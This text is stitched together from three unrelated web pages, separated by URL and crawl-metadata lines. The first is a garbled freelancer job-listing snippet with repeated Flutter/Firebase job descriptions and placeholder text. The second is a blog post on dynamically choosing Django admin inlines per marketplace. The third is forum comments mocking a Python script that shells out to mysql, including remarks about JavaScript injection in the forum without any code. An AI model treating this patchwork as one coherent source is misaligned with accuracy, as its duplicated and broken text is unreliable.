URL:n]", data=[kirjaudu nähd&a... It's a Flutter App project that will use firebase as backend using firestore/cloud messaging/cloud function. we will need to convert HTML from FireStore DB into Flutter app it's all in arabic RTL. I have the sketch design and the database scheme. The app contain 21 pages including splash page / slides page and sign in page - 3 tabs 4 of the pages are html page fetch from firebase. will.... I need the given 3D animation in Html5 code for to avoid slowing down the website so I need the HTML5 code of the animation You Can download the animation from here [kirjaudu nähdäksesi URL:n] but I dont want the following techniques for this job ==> - Embed MP4 or Gif using HTML5 - Image Sequence Technique - Bodymovin becouse it's not working with 3D animation's We have a vector logo and require it to be an animated gif with a transparent background, it is a vector butterfly, the butterfly to have it's wings flapping My project will use firebase as backend using firestore/cloud messaging/cloud function. we will need to convert HTML into flutter it's all in arabic RTL. the admin panel will be in English only. I have the sketch design and the database scheme the app contain 21 pages including splash page / slides page and sign in page - 3 tabs 4 of the pages are html page fetch from firebase. will use nati... 2. Load [kirjaudu nähdäksesi URL:n] &ldqu...?
https://www.fi.freelancer.com/job-search/convert-classic-asp-razor/3/
CC-MAIN-2019-30
refinedweb
1,145
62.98
Dynamic Inlines in the Django AdminAug 03, 2016 Django Django1.9 Tweet I'm not sure how many of you know this, but in the interest of having a well-rounded life, I make a lot of things in my spare time. Over the years, I've been a costumer, a jeweller, a photographer, and a glass artist, among other things. And I don't just mean dabbling - when I get interested in learning something, I throw myself into it almost to the point of fanaticism. I make a lot of things. Which means I have a lot of things filling up my closets and drawers. There's only so much I can gift for birthdays and holidays. So lately I've opened up a shop on Etsy. Opening shops in online marketplaces has meant keeping track of a lot of things around inventory. Etsy's listings manager is nice, but it doesn't really give me everything I want. For a while, I've been using a spreadsheet to keep track of my Etsy listings. But I'm also about to open a shop on Spoonflower. And I'm considering ArtFire. And I need a better way to manage the supplies I use. And I want to keep all this stuff in one place. Naturally, because I'm a programmer, I'm building my own inventory manager. I just started a day ago, so there's obviously a lot of work ahead - I hadn't given a lot of deep thought to what the account and item models needed to look like, so I've been making liberal use of migrations. (I should point out that I'm using Django 1.9. I love it - I've been mired in 1.3 for a while at work, used 1.6 for a few small personal projects, and made it onto 1.8 for some more recent work projects. I love the slight changes in the admin look, and finally having the built-in migrations is a dream come true.) The items I'm storing use a base Item model with a lot of common fields like name, description, and price. But Etsy listings also use some values that are unique, such as Etsy-specific categories, when the item was made, a list of materials to use as search tags, and so on. Meanwhile, Spoonflower listings take a totally different set of parameters, such as material type, colors, and the type of repeat you want to use for your image. For each marketplace (so far just Etsy and Spoonflower), I've added models for values that are only needed when the item is listed on that market. class EtsyItem(models.Model): """ Fields used when the item is listed on 'Etsy' """ item = models.ForeignKey(Item) ... class SpoonflowerItem(models.Model): """ Fields used when the item is listed on 'Spoonflower' """ item = models.ForeignKey(Item) ... This structure does assume that an Item wouldn't be listed on multiple markets - I may leave it that way and just add functionality to allow one Item's basic values to be copied to another record, to be associated with a different market so that each listing is unique. I did also consider subclassing the Item model, but I'm serious about wanting to keep everything in one place - I'd rather not have to manage items in an Etsy list versus a Spoonflower list, etc. Maybe I'll change my mind about that and rewrite this whole thing. But in the meantime, keeping everything together under that Item model presented a challenge - how to add/display the marketplace-specific data for an Item in the admin? I wanted to be able to show the Etsy model as an inline for an item listed for Etsy, a Spoonflower inline for a Spoonflower item, and so on. Here's what I did (and of course you can see this in the inventory/admin.py in the repository): from .models import EtsyItem, SpoonflowerItem class EtsyItemInline(admin.StackedInline): model = EtsyItem extra = 1 max_num = 1 class SpoonflowerItemInline(admin.StackedInline): model = SpoonflowerItem extra = 1 max_num = 1 I started with inlines for each of the custom models. Each Item should have only one of its respective inline objects - setting "extra=1" and "max_num=1" ensures that one instance of that inline will load but that no additional instances can be added to the page. class ItemAdmin(admin.ModelAdmin): ... inlines = [ EtsyItemInline, SpoonflowerItemInline, ] But I still needed a way to prevent all of the inlines from being loaded. An Item sold on Etsy should only have the EtsyItemInline, an Item to be sold on Spoonflower should only load SpoonflowerItemInline, and so on. The first thing I needed to do was make it clear which online marketplace an Item is being sold on. So I went back to the model. My base Item model has a ForeignKey relationship to a seller account, which is in turn associated with a market name - I added a method extra_fields_by_market() to return a string (the desired inline name, based on the market name). class Item(models.Model): account = models.ForeignKey(SellerAccount) ... def extra_fields_by_market(self): extra_inline_model = '' if self.account.market: extra_inline_model = str(self.account.market)+'ItemInline' return extra_inline_model Then back in the admin, I overrode get_formsets_with_inlines(). This method yields formset/inline pairs, which allows me to limit which inlines are displayed for a given object. I was able to use it to display a specific inline only when it matches the market on a base Item: class ItemAdmin(admin.ModelAdmin): ... def get_formsets_with_inlines(self, request, obj=None): for inline in self.get_inline_instances(request, obj): # hide/show market-specific inlines based on market name if obj and obj.extra_fields_by_market() == inline.__class__.__name__: yield inline.get_formset(request, obj), inline The value of obj.extra_fields_by_market() is that string returned by the model - 'EtsyItemInline', 'SpoonflowerItemInline', etc. If that matches the name one of the defined inlines, that inline is returned. I should also note the other condition - if obj. We don't know what market an Item will be listed on until after it's become an object in the database - this means a user would have to fill in the base Item fields, save, then come back to find the additional fields displayed as an inline. If I were better at Javascript, I would have gone in a different direction immediately and had the inline load triggered by the account/market dropdown selection in the base Item. I'll figure that out in a day or two, whenever I get a chance to turn my attention back to the project. Or I'll rewrite the whole thing a few times because I'm not quite satisfied with the data structure. But for now hopefully I've given you some new ideas for ways to manage inlines in your admins.
http://www.mechanicalgirl.com/post/dynamic-inlines-django-admin/
CC-MAIN-2021-17
refinedweb
1,133
63.09
the first custom widget that can paint itself. We also add a useful keyboard interface (with two lines of code). This file is very similar to the lcdrange.rb in Chapter 7. We have added one slot: setRange(). We now add the possibility of setting the range of the LCDRange. Until now, it has been fixed at 0 to 99. def setRange(minVal, maxVal) if minVal < 0 || maxVal > 99 || minVal > maxVal qWarning("LCDRange::setRange(#{minVal}, #{maxVal})\n" + "\tRange must be 0..99\n" + "\tand minVal must not be greater than maxVal") return end @slider.setRange(minVal, maxVal) end The setRange() slot sets the range of the slider in the LCDRange. Because we have set up the Qt::LCDNumber to always display two digits, we want to limit the possible range of minVal and maxVal to avoid overflow of the Qt::LCDNumber. (We could have allowed values down to -9 but chose not to.) If the arguments are illegal, we use Qt's QtGlobal::qWarning() function to issue a warning to the user and return immediately. QtGlobal::qWarning() is a printf-like function that by default sends its output to $stderr. If you want, you can install your own handler function using QtGlobal::qInstallMsgHandler(). lcd.setSegmentStyle(Qt::LCDNumber::Filled) This makes our lcd numbers look way better. I'm not certain, but I believe what makes it possible to do this is setting a palette (see next section). What I do know is that this line has no effect when I tried it in previous chapters, but works here. @currentAngle = 45 setPalette(Qt::Palette.new(Qt::Color.new(250, 250, 200))) setAutoFillBackground(true) The constructor initializes the angle value to 45 degrees and sets a custom palette for this widget. This palette uses the indicated color as background and picks other colors suitably. (For this widget only the background and text colors will actually be used.) We then call setAutoFillBackground(true) to tell Qt fill the background automatically. The Qt::Color is specified as a RGB (red-green-blue) triplet, where each value is between 0 (dark) and 255 (bright). We could also have used a predefined color such as Qt::yellow instead of specifying an RGB value. def setAngle(angle) if angle < 5 angle = 5 elsif angle > 70 angle = 70 end if @currentAngle == angle return end @currentAngle = angle update() emit angleChanged(@currentAngle) end def setAngle(degrees)t::Widget: Ruby syntax. def paintEvent(event) painter = Qt::Painter.new(self) painter.drawText(200, 200, tr("Angle = #{@currentAngle}")) painter.end() end This is our first attempt to write a paint event handler. The event argument contains a description of the paint event. Qt::PaintEvent contains the region in the widget that must be updated. For the time being, we will be lazy and just paint everything. Our code displays the angle value in the widget at a fixed position. We create a Qt::Painter operating on this widget and use it to paint a string. We'll come back to Qt::Painter later; it can do a great many things. angle = LCDRange.new() angle.setRange(5, 70) In the constructor, we create and set up the LCDRange widget. We set the LCDRange to accept angles from 5 to 70 degrees. cannonField = CannonField.new(). gridLayout = Qt::GridLayout.new() So far, we have used Qt::VBoxLayout for geometry management. Now, however, we want to have a little more control over the layout, and we switch to the more powerful Qt::GridLayout class. Qt::GridLayout isn't a widget; it is a different class that can manage the children of any widget. We don't need to specify any dimensions to the Qt::GridLayout constructor. The Qt::GridLayout will determine the number of rows and columns based on the grid cells we populate. The diagram above shows the layout we're trying to achieve. The left side shows a schematic view of the layout; the right side is an actual screenshot of the program. (These two images are copyrighted/owned by Trolltech.)t::GridLayout that the right column (column 1) is stretchable, with a stretch factor of 10. Because the left column isn't (its stretch factor is 0, the default value), Qt::Grid? Try to change "Quit" to "&Quit". How does the button's look change? ( Whether it does change or not depends on the platform.) What happens if you press Alt+Q while the program is running? Center the text in the CannonField.
https://techbase.kde.org/index.php?title=Development/Tutorials/Qt4_Ruby_Tutorial/Chapter_08&oldid=47844
CC-MAIN-2015-11
refinedweb
739
66.94
Creating Class Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 16:13:00 0 In my study book it wants me to create a class named Numbers whose main() method holds two integer variables. It wants me to create two additional methods,sum() and difference(), that compute the sum of and the difference between the two variables, once I have assigned values to the variables. I am having trouble with this. If someone could help me and give a reason behind their answer, that would be great. Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 16:41:00 0 > I am having trouble with this. > If someone could help me and give a reason behind their answer,... it is far better for you to describe the trouble you are having. post the code you have tried, and 'what you get' vs 'what you expect' [ October 08, 2006: Message edited by: Michael Dunn ] Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 17:07:00 0 The trouble that I am having is I am able to write the code up to giving the int a and int b a value and then I seem to get very confused on the rest. The part about having it add and subtract the values is getting me stuck. [ October 08, 2006: Message edited by: Cortney Parsons ] Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 17:22:00 0 > I am able to write the code up to giving the int a and int b a value show us your program that does this much, and we'll try to give you a nudge in the right direction for the rest. Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 18:43:00 0 public class numbers { public static void main (int a, int b) { int a=10, int b=8; Henry Wong author Sheriff Joined: Sep 28, 2004 Posts: 18824 40 I like... posted Oct 08, 2006 18:57:00 0 What happens when you try to compile and run the program -- meaning what is the exception that you are getting? As a hint, take a look at the signature of the main() methods of other programs. Notice how is it different from yours. Henry Books: Java Threads, 3rd Edition , Jini in a Nutshell , and Java Gems (contributor) Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 19:41:00 0 1) public static void main (int a, int b) assuming you can get it to compile OK, it won't run because your main() does not match the method signature required to start a program. There should be plenty of sample public static void main(...) in your book, so check how the method should be written. 2) int a=10, int b=8; you cannot specify 'types', separated by commas (even if they are the same) either separate them by a semi-colon, or remove the 'int' from b 3) if you fix (1) you won't have this problem, but at the moment you have 2 x local variables named a, and 2 named b - these will generate "already defined errors" 4) class numbers technically won't affect the running of a program, but Sun's naming conventions have classes starting with a capital letter i.e. Numbers, and following the conventions is a good habit to get into. if you fix 1 and 2, you should have your opening requirement, a program with 2 int variables (doubtful you are required to pass them to the program as arguments). from there you want to create and call a method to add the 2 numbers, so your method will look something like this accessor|return type|method name|arguments accessor: public private etc return type: String int double etc, can be void method name: in this case sum arguments: can be no arguments () or one, methodName(float f) or more, mthodName(float f,double d)//here is where 'types' are comma-separated if, in the signature, you have a non-void return type, you must include in the method a return statement that returns a value of a type that matches that in the method signature e.g. if your method signature starts public String...... you must include in the method public String...... { ... return someStringValue; } so, for your sum(), you would pass to it the 2 arguments of the a and b variables in main(), then within sum() you would create another variable to represent the sum of the 2 arguments, then return the 'sum' variable. It is important to understand that sum() will be working with the argument names supplied in the method, not the names of the variables passed to the method e.g. it might seem easier for you to write this public int sum(int a, int b) { //add up a and b return addedNumber; } but using the same variable names could confuse you when it comes to variable scope. the variable names of a and b here sum(int a, int b) could be any name at all sum(int x, int y) which means //add up a and b becomes //add up x and y you want to use the value in main(), so it is easier to create a variable to hold the return value from sum() int a = 8, b = 10; int numbersAdded = sum(a,b);//note - you only pass the name, not the type. now you have the added value in main() and you can do anything you want with it, print it out, to check accuracy, use it in another calculation etc. repeat above for difference(), and you should just about have it I agree. Here's the link: subject: Help Creating Class Similar Threads So, which of these would be... Performing math equations within arrays Create a Die Class merging two HashMaps Instance Variables & Class Variables All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/405029/java/java/Creating-Class
CC-MAIN-2014-41
refinedweb
1,022
64.88
Git workflow This guide explains how to update your local copy of pmaports.git, and how to contribute back changes (e.g. after creating a new device port). It is suitable for people who have not used git before. Contents The basics pmaports dir During pmbootstrap init, the whole pmaports.git repository was cloned to your computer. You can use pmbootstrap config aports to see the path, and if you chose the default work path, you will get: $ pmbootstrap config aports ~/.local/var/pmbootstrap/cache_git/pmaports All commands below need to be executed in your pmaports dir. It's a good idea to make accessing this directory easy with a short command, so consider setting up a shell alias. For bash this can be done by adding alias pma="cd ~/.local/var/pmbootstrap/cache_git/pmaports" to ~/.bashrc. Updating pmaports (rebasing on master) Since we are dealing with a git repository, pmbootstrap leaves the directory alone after the initial clone. It will not automatically update it. The only thing it will do is tell you when your pmaports.git dir is so outdated that you absolutely have to update it, or otherwise it would be incompatible with your pmbootstrap version. But you can always manually update the pmaports.git directory, and it is recommended to do so before you start or continue with making changes to the repository. Make sure that you are on master If you never ran any git commands in this directory before, you will still be on the master branch. Otherwise, run this command to check the branch name (there is also git branch, but we do have a lot of branches, so the one below is probably easier). Switch back to master if necessary with git checkout master. $ git rev-parse --abbrev-ref HEAD master (You may want to extend your shell to automatically display the branch name when you are inside a git directory, e.g. by using grml-zsh-config and ZSH.) Put your changes into a new branch Check if you made any changes to your pmaports dir. Changes could come from starting a new device port, for example. When you have made no changes, you can move on to the next step ("Running 'git pull'"): $ git status On branch master Your branch is up to date with 'origin/master'. nothing to commit, working tree clean When you have made changes, git status will list the files that were changed: $ git status On branch master Your branch is up to date with 'origin/master'. Changes not staged for commit: (use "git add <file>..." to update what will be committed) (use "git checkout -- <file>..." to discard changes in working directory) modified: device/device-lg-mako/APKBUILD no changes added to commit (use "git add" and/or "git commit -a") Create a new branch, commit the changes and go back to the master branch: $ git checkout -b mynewbranch M device/device-lg-mako/APKBUILD Switched to a new branch 'mynewbranch' $ git add -A $ git commit -m "describe your change here" [mynewbranch c9c729a5] describe your change here 1 file changed, 1 insertion(+), 1 deletion(-) $ git checkout master Switched to branch 'master' Your branch is up to date with 'origin/master'. Note that there are best practices for commit messages, and for commits that actually make it into the master branches of pmaports.git, we try to stick to them. Type git commit instead of git commit -m "describe your change here" and your editor will show up, where you can type in a pretty commit message. You can change the default editor by changing the EDITOR environment variable. Running 'git pull' Let's fetch the changes from the official postmarketOS repository and apply them to the current branch. Git will even show a nice overview of the files that have been changed, and how many lines have changed. $ git pull Updating e8a7926e..8909e932 Fast-forward coreapps/coregarage/APKBUILD | 24 ++++++++++++++++++++++++ ... 26 files changed, 307 insertions(+), 181 deletions(-) create mode 100644 coreapps/coregarage/APKBUILD ... If you did not have any local changes, then you are done here. Updating your branch(es) Put all new commits from master into your own branch, and then apply the changes you made on top of that: $ git checkout mynewbranch Switched to branch 'mynewbranch' $ git rebase master First, rewinding head to replay your work on top of it... Applying: description here If there are any conflicts, pay attention to the git output and run git diff to see where the conflicts are. Edit the files in a text editor, run git add -A and then continue the rebase. Creating a merge request Preparation These steps only need to be done the first time. Forking the repository We are currently using GitLab for development. Login to the website, and click here to fork pmaports.git to your own user's namespace. If you have just registered at GitLab, create a SSH key and store it in the settings. Add your fork as remote Run this, but replace USERNAME twice with your GitLab username. $ git remote add USERNAME git@gitlab.com:USERNAME/pmaports.git Push changes to your fork The first time you try to push your changes (upload them), git won't know where you want to put them: $ git push fatal: The current branch mynewbranch has no upstream branch. To push the current branch and set the remote as upstream, use git push --set-upstream origin mynewbranch So we will tell git the remote we would like to use. $ git push --set-upstream USERNAME mynewbranch Enter passphrase for key '/home/user/.ssh/id_rsa': Counting objects: 59, done. Delta compression using up to 2 threads. Compressing objects: 100% (39/39), done. Writing objects: 100% (59/59), 13.48 KiB | 1.68 MiB/s, done. Total 59 (delta 29), reused 0 (delta 0) remote: remote: To create a merge request for mynewbranch, visit: remote: remote: To gitlab.com:USERNAME/pmaports.git * [new branch] mynewbranch -> mynewbranch Branch 'mynewbranch' set up to track remote branch 'mynewbranch' from 'USERNAME'. When you want to push more changes, you can simply use git push for this branch. There is also git push --force, which can be used to override commits without creating new ones. You can use it after rebasing your branch on master (as explained above). git rebase -i master is a powerful command to edit previous commits, the -i option stands for interactive. See git-rebase.io for an in depth tutorial on interactive rebasing. Create the MR Simply click the link shown in the git output above, to create the new merge request. Pay attention to the text shown there, following it closely will make sure that your merge request gets merged to master as fast as possible. See also - in depth interactive git rebase tutorial (explains fixing previous commits, squashing commits, splitting one commit into several, reordering commits, etc.)
https://wiki.postmarketos.org/index.php?title=Git_workflow&mobileaction=toggle_view_mobile
CC-MAIN-2019-26
refinedweb
1,143
72.05
Masonite 1.6 brings mostly minor changes to the surface layer of Masonite. This release brings a lot of improvements to the engine of Masonite and sets up the framework for the release of 2.0. Previously, all cookies were set with an HttpOnly flag when setting cookies. This change came after reading several articles about how cookies can be read from Javascript libraries, which is fine, unless those Javascript libraries have been compromised which could lead to a malicious hacker sending your domain name and session cookies to a third party. There is no the ability to turn the HttpOnly flag off when setting cookies by creating cookies like: request().cookie('key', 'value', http_only=False) Because craft is it's own tool essentially and it needs to work across Masonite versions, all commands have been moved into the Masonite repository itself. Now each version of Masonite maintains it's own commands. The new craft version is 2.0 pip install masonite-cli==2.0 --user Before, you had to use the Manager class associated with a driver to switch a driver. For example: def show(self, Upload, UploadManager):Upload.store(...) # default driverUploadManager.driver('s3').store(...) # switched drivers Now you can switch drivers from the driver itself: def show(self, Upload):Upload.store(...) # default driverUpload.driver('s3').store(...) # switched drivers This version has been fine tuned for adding packages to Masonite. This version will come along with a new Masonite Billing package. The development of Masonite Billing has discovered some rough spots in package integrations. One of these rough spots were adding controllers that were not in the project. For example, Masonite Billing allows adding a controller that handles incoming Stripe webhooks. Although this was possible before this release, Masonite 1.6 has added a new syntax: ROUTES = [...# Old Syntax:Get().route('/url/here', '[email protected]').module('billing.controllers')# New Syntax:Get().route('/url/here', '/[email protected]')...] Notice the new forward slash in the beginning where the string controller goes. Previously, controllers were created as they were specified. For example: $ craft controller DashboardController created a DashboardController. Now the "Controller" part of the controller is appended by default for you. Now we can just specify: $ craft controller Dashboard to create our DashboardController. You may was to actually just create a controller called Dashboard. We can do this by specifying a flag: $ craft controller Dashboard -e short for "exact" It's also really good practice to create 1 controller per "action type." For example we might have a BlogController and a PostController. It's easy to not be sure what action should be in what controllers or what to name your actions. Now you can create a "Resource Controller" which will give you a list of actions such as show, store, create, update etc etc. If what you want to do does not fit with an action you have then you may want to consider making another controller (such as an AuthorController) You can now create these Resource Controllers like: craft controller Dashboard -r Just like the global controllers, some packages may require you to add a view that is located in their package (like the new exception debug view in 1.6) so you may now add views in different namespaces: def show(self):return view('/masonite/views/index') This will get a template that is located in the masonite package itself. You can now group routes based on a specific string prefix. This will now look like: routes/web.pyfrom masonite.helpers.routes import get, groupROUTES = [get('/home', ...)group('/dashboard', [get('/user', ...)get('/user/1')])] which will compile down into /dashboard/user and /dashboard/user/1 The container was one of the first features coded in the 1.x release line. For Masonite 1.6 we have revisited how the container resolves objects. Before this release you had to put all annotation classes in the back of the parameter list: from masonite.request import Requestdef show(self, Upload, request: Request):pass If we put the annotation in the beginning it would have thrown an error because of how the container resolved. Now we can put them in any order and the container will grab each one and resolve it. from masonite.request import Requestdef show(self, Upload, request: Request, Broadcast):pass This will now work when previously it did not. The container will now resolve instances of classes as well. It's a common paradigm to "code to an interface and not an implementation." Because of this paradigm, Masonite comes with contracts that act as interfaces but in addition to this, we can also resolve instances of classes. For example, all Upload drivers inherit the UploadContract contract so we can simply resolve the UploadContract which will return an Upload Driver: from masonite.contracts.UploadContract import UploadContractdef show(self, upload: UploadContract):upload.store(...) Notice here that we annotated an UploadContract but got back the actual upload driver. You can now search the container and "collect" objects from it by key using the new collect method: app.collect('Sentry*Hook') which will find all keys in the container such as SentryExceptionHook and SentryWebHook and make a new dictionary out of them. A complaint a few developers pointed out was that Masonite has too many dependencies. Masonite added Pusher, Ably and Boto3 packages by default which added a bit of overhead, especially if developers have no intentions on real time event broadcasting (which most applications probably won't). These dependencies have now been removed and will throw an exception if they are used without the required dependencies. Masonite 1.6 + will slowly be rolling out various framework hooks. These hooks will allow developers and third party packages to integrate into various events that are fired throughout the framework. Currently there is the abilitity to tie into the exception hook which will call any objects loaded into the container whenever an exception is hit. This is great if you want to add things like Sentry into your project. Other hooks will be implemented such as View, Mail and Upload Hooks.
https://docs.masoniteproject.com/whats-new/masonite-1.6
CC-MAIN-2020-34
refinedweb
1,006
55.95
Coding standards increase productivity in the development process, make code easier to maintain, and keep code from being tied to one person or team. But where should standards come from? How extensive should they be, and more importantly, who should enforce them? Here are the short answers to these questions. Who dictates the coding standards? You can choose from many industry coding standards. Some companies—Microsoft and Sun Microsystems, for example—offer guidelines. Some coding standards, such as Hungarian Notation, are the product of one person’s labor (in this case, Dr. Charles Simonyi, a Hungarian software developer at Microsoft). Certain coding standards are language specific. Standards for Visual Basic dictate that you should prefix all textboxes with ”txt” and all buttons with ”cmd.” Sun Microsystems offers coding standards for Java. Once you’ve settled on a coding standard, take the language-specific suggestions and add your own. For example, you might decree that variable and function names should be descriptive, or that the behavior of particular functions must be clearly commented. (My mantra is “Document, document, document: every class, every method, every few lines of code.”) How extensive should coding standards be? While it’s important to have coding standards, it’s equally important not to have superfluous coding standards. Imagine, if you will, a standard that dictates that the first character of a variable name must indicate the application in which it resides, the second character must indicate the module, and the third character must indicate the data type. Excessive coding standards such as this can impede the creative process and become a hindrance to development. You should not have more coding standards than will fit on one or two pages. It makes it very hard to name your variable if you have to consult a chart to do so. Who enforces coding standards? I’ve worked in many software shops where coding standards existed, but no one enforced them. The result: The coding standards were about as effective as the “So, come here often?” pickup line. The first step in enforcing coding standards is to keep those standards easily accessible. Ideally, you should have a laminated cheat sheet pinned up in each developer’s cube. During peer code review sessions, someone’s job must include being code standards bad cop. However, automated tools offer another option to managers looking to enforce standards. Some of the best tools on the market are made by Parasoft. Parasoft produces language-specific tools that automatically enforce more than 300 coding standards. The products include a RuleWizard feature, which allows developers to create and implement their own custom rules. I will review Parasoft products in future articles. One of the standards enforced by Parasoft products requires that one-character variable names be used only for their conventional purpose, such as b for a byte, c for a char, f for a float. If this standard is violated, the output would look like this: package examples.rules.naming; public class CVN { void method () { int b = 1; // VIOLATION } } Conclusion Coding standards are a must for any development team. They ensure consistency and simplify the maintenance process with legible code. Your job is to make sure a standard is chosen, strictly followed, and always on the developer’s mind.
http://www.techrepublic.com/article/coding-standards-101/
CC-MAIN-2017-43
refinedweb
544
56.96
please I want to reverse word using stl like that input this is a test output test a is this This is a discussion on Reverse Words within the C++ Programming forums, part of the General Programming Boards category; please I want to reverse word using stl like that input this is a test output test a is this... please I want to reverse word using stl like that input this is a test output test a is this Show the code that you have so far. Kurt but it didnt work :/but it didnt work :/Code:#include<iostream> #include<string> #include<vector> using namespace std; int main() { string str; int x; vector<string>v; cin>>x; cin.ignore(); for(int i=1;i<=x;i++) { getline(cin,str); str.rbegin()==str.rend(); cout<<"Case #"<<i<<": "<<str<<endl; } return 0; } Line 15 does not do anything. My homepage Advice: Take only as directed - If symptoms persist, please see your debugger Linus Torvalds: "But it clearly is the only right way. The fact that everybody else does it some other way only means that they are wrong" how could i reverse a vector with string???? This is not a free code factory and it is not a free homework factory, and you will not get help here unless you demonstrate effort to solve the problem (i.e. post something that people can look at and realise you have genuinely tried). At this stage, your code reads strings, but neither inserts any of those strings into the vector, and also demonstrates no attempt to reverse anything. So you're not meeting your side of the deal. And hacking at random and bluffing will not work. The solution is VERY simple, so we know what people will probably do if they genuinely try. Last edited by grumpy; 08-04-2012 at 05:03 PM. Right 98% of the time, and don't care about the other 3%. I am really tried and I am already studied stl so I tried to solve this problem so I want to know how to reverse a string with vector and I search on the internet to find but it didn't work I'm sorry if I bothered you Last edited by sarasaad; 08-04-2012 at 05:14 PM. Your code does not actually use the vector that you declared. If you put each of the words in the vector, all you really have to do is figure out how to arrange the output in reverse.
http://cboard.cprogramming.com/cplusplus-programming/150042-reverse-words.html
CC-MAIN-2014-41
refinedweb
421
74.83
- . wow, im cool Admin Well, at least it worked... kind of... Admin No, you have too much free time ;) Admin 4th place! not bad... Admin wow. that's all I'm going to say. Admin WTF??!? This guy is obviously an old-sk00l shell scripter who has just learned python. I've seen stuff like this as a BASH script too many times to count. Admin The sad thing is how often this happens. I was hired once to rewrite the back-end a non-functional adult website (no puns intended). The Perl scripts the last 60-an-hour consultant wrote were littered with backticked calls to MySQL. Admin Admin Can someone port this to Windows for me? [:P] (I see that one way or another, the forum software is going to have to change...[8-)]) Admin This could be a useful trick if you're using an obscure scripting language that really doesn't have MySQL drivers >:-) --Daniel T Admin So I guess reposting old WTF's is a good way to say he's run out of real coding errors? Admin Wow, did the author of one of the WTF's get pissed at Alex or something? Regretfully changing the software won't keep this from happening. Even if you are required to sign up first this guy can sign up, post get banned and sign up again using yet another msn or hotmail address. ____________ I am that signature virus, propogating in an assited manner. Admin A co-worker pointed out to me... Judging from the setting, it was probably some poor kid fresh out of Programming 101 with no clue about database libraries, getting paid $5/hour to build this script. If it was in an professional/enterprise/production setting, fine, it's a WTF - in this case, it's probably just a clever student. --Daniel T Admin One more comment ;-) That screenshot is from EditPlus, isn't it? I love it!!!! --Daniel T Admin This guy probably heard that "Python is a scripting language" so he's using it as a replacement for #!/bin/sh instead of the full-featured programming language that it is. Admin Slightly more sophisticated software could weed out excessive repetitions, maybe. Also, just a line of code could get rid of those Javascript "injections." Admin Yes, but that's Perl - backticked calls to external programs are a long-standing tradition (albeit in this case a WTF-worthy one). Python makes you jump through slightly more hoops to do the same thing (and probably with good reason). Admin Slash ( ) does a very good job at filtering out trolls. Admin For what it's worth, the MySQL shell tool outputs tab separated values. So the script won't "fail if anything resembling a space is present in the database", just if there's a tab. Admin You wish. For example, I took a look at the LiveJournal code, and while the comment-parsing code is fairly secure (due to a paranoid HTML parser and rewriter) it had a number of additional checks required to handle web-browser specific quirks in parsing HTML, which obviously only got added in response to people noticing security holes. Also, anything short of a full parser (ideally whitelisting), preferably rewriting the HTML in an unambiguous fashion, probably won't cut it reliably due to various... interesting tricks involving HTML entities, comments, punctuation and the like. Admin ... as opposed to a language whose selling point is integration with the database at the web server. Lets not forget that this code isn't running anywhere near a backend. This code runs where UI is rendered. :) Admin Haha, my apologies to the Python coders (really!). I don't know why I read this post as PHP. Maybe the syntax coloring <g>. Admin Except the script uses .split(), not .split('\t'), so it will split fields on any whitespace, not just tabs. Admin Amusingly, as long as you have a cygwin/mingw compile of mailman sitting in c:\usr\local\mailman (or whatever your system drive is), this python script would work just fine, fwiw. :p (Unless they're shell scripts, guess you'd have to replace them with batch files that ran them inside the cygwin environment.) Thankfully I can't see whatever got posted, and I don't really care anyway as long as it isn't another goatse. But I am a bit worried that next up is IE/ActiveX exploits. Admin and r. flowers, I find your avatar a bit umm, disturbing. Not that that is a bad thing. I think the only way to be rid of things like this is to deny all javascript and html and just simply block text all replies. Even then you won't have a decent way around repeated lines in a post or even for someone to copy the entire first chapter of a novel into the post and upload, no repitition is necessary. This then leads to the question of how long can a post get before you truncate it? There is no perfect answer. CAPTCHA = register (is someone trying to tell me something?) Admin I think I will change it. He's starting to disturb me, too. I found him by doing a Google image search for "WTF." Admin Don't know about that; someone was injecting invisible JavaScript that would quietly post a comment on IE on some of the other forum threads earlier, though. (At least, it would if it actually worked - so many script kiddies just don't test their code properly. I really don't know what the world is coming to...) Besides, I use Konqueror, so I'm probably safe (you can more-or-less use the forum, as long as you pretend to be an IE user and don't try and use the fancy WYSIWIG HTML editor/toolbar - would it kill them to write portable code for once?). Admin Yes. It was part of the deal that Bill signed with the Devil. Admin I actually like the general approach for its decoupling qualities: - No need to link a specific database library into the server - Easily adaptable to other database CLIs - at least in theory - Execution time is generally not an issue this days on web servers (unless you run Slashdot or some other popular site) Admin Now you're just trolling, aren't you? BTW, does Python have weak references? I just read an introductary book and there was no mention of this feature. Admin I like its highly modular architecture. It seems that /usr/local/mailman/bin/list_lists, /usr/local/mailman/bin/newlist and /usr/local/mailman/bin/rmlist are all separate scripts, called by os.popen and the like. They might be even some bash for all we know. And intermediate mysql_cmds.txt is probably being created for efficiency reasons - the coder must have thought it's faster to have one call to os.* than thousands. This is optimization gone the absolutely wrong way. But it's nice he put some effort into it... Admin <span id="_ctl0_PostForm_Reply">I just read an introductary book and there was no mention of this feature.<br><br></span> <span id="_ctl0_PostForm_Reply"></span> <span id="_ctl0_PostForm_Reply"></span> class A(object): def method(self): return 1337 a = A() a_weak = weakref.ref(a) <span style="font-style: italic;"># Calling the weakref will reveal the object if it still exists</span> print a_weak(), a <span style="font-style: italic;"># <__main__.A object at 0x732d0> <__main__.A object at 0x732d0></span> print a_weak().method() # 1337 a = "Not the A you are looking for" print a_weak() <span style="font-style: italic;"># None</span><span style="font-style: italic;" id="_ctl0_PostForm_Reply"></span> Admin What I like about this code is how they are using "Python" like if it was bash, ignoring every possibility to use a normal database driver or mailman libraries. Of course, using Python instead of say bash will make it a bit easier to split those lists by <span style="font-family: Courier New;">[a for a in existing if not a in db_list_names],</span> but that is about the only Pythonish thing in the code - which of course in newer Pythons is done faster and easier by using sets. Admin Full documentation at - as well as Python's standard weak references, there's also weakref proxy objects (which act almost like the actual object referred to - not a good idea to use carelessly, since they might disappear at any moment) and dictionaries with weak keys/values. Admin If you're looking for something in Python, first stop is the Global Module Index, always (second one is the standard library reference). And in the Module Index you can find the 